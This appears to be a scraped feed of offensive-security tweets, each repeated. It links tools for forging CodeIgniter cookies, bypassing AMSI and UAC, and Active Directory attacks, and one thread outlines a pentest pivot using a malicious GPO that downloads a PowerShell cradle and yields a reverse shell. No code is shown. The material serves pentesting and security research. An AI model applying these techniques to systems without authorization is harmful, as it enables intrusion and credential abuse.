😈 [ podalirius_, Podalirius ]
I published a tool to #bruteforce the key of @CodeIgniter's session #cookies, in order to sign arbitrary attacker-controlled cookies🍪
I wrote this tool for a use case encountered in #bugbounty recently, but we can find this in #pentest too.
https://t.co/7JIiYQskoG
🔗 https://github.com/p0dalirius/CodeIgniter-session-unsign
🐥 [ tweet ]
I published a tool to #bruteforce the key of @CodeIgniter's session #cookies, in order to sign arbitrary attacker-controlled cookies🍪
I wrote this tool for a use case encountered in #bugbounty recently, but we can find this in #pentest too.
https://t.co/7JIiYQskoG
🔗 https://github.com/p0dalirius/CodeIgniter-session-unsign
🐥 [ tweet ]
😈 [ 0gtweet, Grzegorz Tworek ]
Is #SysInternals Sysmon good for discovering the full historical process tree? Of course! Bored with manual process, I have create simple (but fully working) PowerShell noscript, displaying the tree in a nicely walkable form. Enjoy: https://t.co/eZFIDBT2lN
🔗 https://github.com/gtworek/PSBits/blob/master/DFIR/GetSysmonTree.ps1
🐥 [ tweet ]
Is #SysInternals Sysmon good for discovering the full historical process tree? Of course! Bored with manual process, I have create simple (but fully working) PowerShell noscript, displaying the tree in a nicely walkable form. Enjoy: https://t.co/eZFIDBT2lN
🔗 https://github.com/gtworek/PSBits/blob/master/DFIR/GetSysmonTree.ps1
🐥 [ tweet ]
🤔2
👹 [ snovvcrash, sn🥶vvcr💥sh ]
[#HackStory 🧵] (1/4) Here’s a generic case of reaching a locked-down PC from a firewalled segment in AD. The background is: 172.16.66.6 (the target) can talk to 192.168.1.11 (a PWNed server) but not vice versa and to no one else in the foreseeable network 👀
#ad #pentest
🐥 [ tweet ]
[#HackStory 🧵] (1/4) Here’s a generic case of reaching a locked-down PC from a firewalled segment in AD. The background is: 172.16.66.6 (the target) can talk to 192.168.1.11 (a PWNed server) but not vice versa and to no one else in the foreseeable network 👀
#ad #pentest
🐥 [ tweet ]
🔥1
👹 [ snovvcrash, sn🥶vvcr💥sh ]
(2/4) Being a DA an adversary can create an evil GPO that will coerce Immediate Scheduled Task execution on the target. The task downloads and executes a PS cradle pointing to the PWNed server. Sure, there’re fancy (py|Sharp)GPOAbuse, etc… But when it’s a pentest, who cares 😒
🐥 [ tweet ]
(2/4) Being a DA an adversary can create an evil GPO that will coerce Immediate Scheduled Task execution on the target. The task downloads and executes a PS cradle pointing to the PWNed server. Sure, there’re fancy (py|Sharp)GPOAbuse, etc… But when it’s a pentest, who cares 😒
🐥 [ tweet ]
👹 [ snovvcrash, sn🥶vvcr💥sh ]
(3/4) Meanwhile, some v4tov4 port proxies are configured on the pivot point by the adversary via netsh 😈
🐥 [ tweet ]
(3/4) Meanwhile, some v4tov4 port proxies are configured on the pivot point by the adversary via netsh 😈
🐥 [ tweet ]
👹 [ snovvcrash, sn🥶vvcr💥sh ]
(4/4) After 90 to 120 minutes the GPO gets applied and the adversary receives a reverse shell / C2 agent on his box with a further ability to spawn a reverse SOCKS proxy 🎉
🐥 [ tweet ]
(4/4) After 90 to 120 minutes the GPO gets applied and the adversary receives a reverse shell / C2 agent on his box with a further ability to spawn a reverse SOCKS proxy 🎉
🐥 [ tweet ]
🔥2
👹 [ snovvcrash, sn🥶vvcr💥sh ]
(5/4) Not the last to be mentioned that GPOs are not the only way to coerce job execution on a group of targets. There’re also some lovely control centers that some commercial AV/EDR developers gently provide pentesters with 🤫
🐥 [ tweet ]
(5/4) Not the last to be mentioned that GPOs are not the only way to coerce job execution on a group of targets. There’re also some lovely control centers that some commercial AV/EDR developers gently provide pentesters with 🤫
🐥 [ tweet ]
😈 [ mariuszbit, Mariusz Banach ]
💎 Can't count in how many Active Directory audits this monstrous Cypher query helped me swiftly collect stats of a #BloodHound collection!⚡
Simply Find & Replace "contoso.com" w/ your target domain aaaand you have it
https://t.co/2ChJ1n7Qzo
Helpful? Lemme know!💀
🔗 https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md
🐥 [ tweet ]
💎 Can't count in how many Active Directory audits this monstrous Cypher query helped me swiftly collect stats of a #BloodHound collection!⚡
Simply Find & Replace "contoso.com" w/ your target domain aaaand you have it
https://t.co/2ChJ1n7Qzo
Helpful? Lemme know!💀
🔗 https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md
🐥 [ tweet ]
😈 [ 0xdf_, 0xdf ]
Undetected from @hackthebox_eu has me following in the steps of a previous attacker. There's an insecure PHP module, reversing a malicious kernel exploit and a backdoored sshd. Lots of Ghidra and understanding the attackers steps and reusing them.
https://t.co/ItYsl66OVM
🔗 https://0xdf.gitlab.io/2022/07/02/htb-undetected.html
🐥 [ tweet ]
Undetected from @hackthebox_eu has me following in the steps of a previous attacker. There's an insecure PHP module, reversing a malicious kernel exploit and a backdoored sshd. Lots of Ghidra and understanding the attackers steps and reusing them.
https://t.co/ItYsl66OVM
🔗 https://0xdf.gitlab.io/2022/07/02/htb-undetected.html
🐥 [ tweet ]
😈 [ HuskyHacksMK, Matt | HuskyHacks ]
the user said it looked safe🤦♂️ New PMAT bonus binary sample is up!
Difficulty: 🟨(med)
Available here (the labs are free and always will be):
https://t.co/YvMIe2D0DR
https://t.co/H9OaPt1XtJ
🔗 https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/X-X.BonusBinaries/Dropper.installer.msi.malz
🔗 https://github.com/HuskyHacks/PMAT-labs
🐥 [ tweet ]
the user said it looked safe🤦♂️ New PMAT bonus binary sample is up!
Difficulty: 🟨(med)
Available here (the labs are free and always will be):
https://t.co/YvMIe2D0DR
https://t.co/H9OaPt1XtJ
🔗 https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/X-X.BonusBinaries/Dropper.installer.msi.malz
🔗 https://github.com/HuskyHacks/PMAT-labs
🐥 [ tweet ]
😈 [ cry__pto, Ammar Amer🇸🇾 ]
AMSI Unchained: Review of Known AMSI Bypass Techniques and Introducing a New One
https://t.co/uGpsIOkplP
🔗 https://www.blackhat.com/asia-22/briefings/schedule/#amsi-unchained-review-of-known-amsi-bypass-techniques-and-introducing-a-new-one-26120
🐥 [ tweet ]
AMSI Unchained: Review of Known AMSI Bypass Techniques and Introducing a New One
https://t.co/uGpsIOkplP
🔗 https://www.blackhat.com/asia-22/briefings/schedule/#amsi-unchained-review-of-known-amsi-bypass-techniques-and-introducing-a-new-one-26120
🐥 [ tweet ]
😈 [ _nwodtuhs, Charlie Bromberg (Shutdown) ]
So apparently Microsoft ninja-patched two things lately in KB5014692 (06/14/2022)
1. ShadowCoerce (auth coercion abusing MS-FSRVP)
2. Self-RBCD trick to bypass limitations of Kerberos Constrained Delegation without Protocol Transition
Identified this with @Geiseric4 and @mkolsek
🐥 [ tweet ]
So apparently Microsoft ninja-patched two things lately in KB5014692 (06/14/2022)
1. ShadowCoerce (auth coercion abusing MS-FSRVP)
2. Self-RBCD trick to bypass limitations of Kerberos Constrained Delegation without Protocol Transition
Identified this with @Geiseric4 and @mkolsek
🐥 [ tweet ]
😈 [ mpgn_x64, mpgn ]
CrackMapExec version 5.3.0 "OPERATION C01NS 🪙" is now public 🎉🎉🎉
Lot's of new features and fixed issues. All private features from the @porchetta_ind repo have been integrated to the public repository (rdp, audit mode, laps winrm etc)🚀
https://t.co/ozLmJNyUmn
🔗 https://github.com/Porchetta-Industries/CrackMapExec/releases/tag/v5.3.0
🔗 https://mpgn.gitbook.io/crackmapexec/news-2022/operation-c01ns
🐥 [ tweet ]
CrackMapExec version 5.3.0 "OPERATION C01NS 🪙" is now public 🎉🎉🎉
Lot's of new features and fixed issues. All private features from the @porchetta_ind repo have been integrated to the public repository (rdp, audit mode, laps winrm etc)🚀
https://t.co/ozLmJNyUmn
🔗 https://github.com/Porchetta-Industries/CrackMapExec/releases/tag/v5.3.0
🔗 https://mpgn.gitbook.io/crackmapexec/news-2022/operation-c01ns
🐥 [ tweet ]
GitHub
Release 5.3.0 - Operation C01NS · Porchetta-Industries/CrackMapExec
More on https://mpgn.gitbook.io/crackmapexec/
What's Changed
Add RDP protocol thanks to @skelsec
Set computer accounts as owned in BloodHound by @snovvcrash in #532
fix filename for IPv6 on wi...
What's Changed
Add RDP protocol thanks to @skelsec
Set computer accounts as owned in BloodHound by @snovvcrash in #532
fix filename for IPv6 on wi...
😈 [ EricaZelic, malCOM ]
New UAC bypass credited to @filip_dragovic
https://t.co/yVo7xnbWJj
🔗 https://github.com/Wh04m1001/IDiagnosticProfileUAC
🐥 [ tweet ]
New UAC bypass credited to @filip_dragovic
https://t.co/yVo7xnbWJj
🔗 https://github.com/Wh04m1001/IDiagnosticProfileUAC
🐥 [ tweet ]
😈 [ ShitSecure, S3cur3Th1sSh1t ]
Just added the two new AMSI bypass PoC's via Provider Patching into my Amsi-Bypass-Powershell repo. Plus one PoC in Nim as pull request for OffensiveNim:
https://t.co/CSqnqAuUaz
https://t.co/4W8RSPuzVG
Tested both, works perfectly fine. 👌
🔗 https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
🔗 https://github.com/byt3bl33d3r/OffensiveNim/pull/51
🐥 [ tweet ]
Just added the two new AMSI bypass PoC's via Provider Patching into my Amsi-Bypass-Powershell repo. Plus one PoC in Nim as pull request for OffensiveNim:
https://t.co/CSqnqAuUaz
https://t.co/4W8RSPuzVG
Tested both, works perfectly fine. 👌
🔗 https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
🔗 https://github.com/byt3bl33d3r/OffensiveNim/pull/51
🐥 [ tweet ]
😈 [ mrd0x, mr.d0x ]
Nothing too crazy in this blog post, but thought it may be useful for some people. Enjoy!
Social engineering your way into the network.
https://t.co/uPVBiClrXc
🔗 https://mrd0x.com/social-engineering-your-way-into-the-network/
🐥 [ tweet ]
Nothing too crazy in this blog post, but thought it may be useful for some people. Enjoy!
Social engineering your way into the network.
https://t.co/uPVBiClrXc
🔗 https://mrd0x.com/social-engineering-your-way-into-the-network/
🐥 [ tweet ]